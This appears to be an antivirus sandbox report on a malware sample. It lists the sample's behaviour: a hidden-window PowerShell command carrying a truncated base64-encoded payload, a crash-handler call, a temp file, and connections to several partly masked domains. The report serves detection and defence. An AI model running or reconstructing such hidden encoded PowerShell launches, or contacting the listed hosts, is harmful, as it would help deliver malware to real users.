Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGEAdwB3AGUAZwB2AHEAdwA9ACcATQB2AG4AYgBmAGEAZgBlAHEAdQBpAGwAYgAnADsAJABJAGkAbwBnAGYAcgB5AGgAdABkAHgAeQAgAD0AIAAnADMAOQAyACcAOwAkAFoAcQB6AGkAaAB6AHkAegBlAHEAbgB4AHUAPQAnAEwAaQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
Modifies file system
Creates the following files
- %TEMP%\1322810.cvr
Network activity
Connects to
- 'ex####encall.com':443
- 'vo####otterdam.nl':443
TCP
Other
- 'vo####otterdam.nl':443
UDP
- DNS ASK va##zas.com
- DNS ASK st####eairways.com
- DNS ASK ex####encall.com
- DNS ASK tr###s.nextg.io
- DNS ASK vo####otterdam.nl
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABKAGEAdwB3AGUAZwB2AHEAdwA9ACcATQB2AG4AYgBmAGEAZgBlAHEAdQBpAGwAYgAnADsAJABJAGkAbwBnAGYAcgB5AGgAdABkAHgAeQAgAD0AIAAnADMAOQAyACcAOwAkAFoAcQB6AGkAaAB6AHkAegBlAHEAbgB4AHUAPQAnAEwAaQB...' (with hidden window)
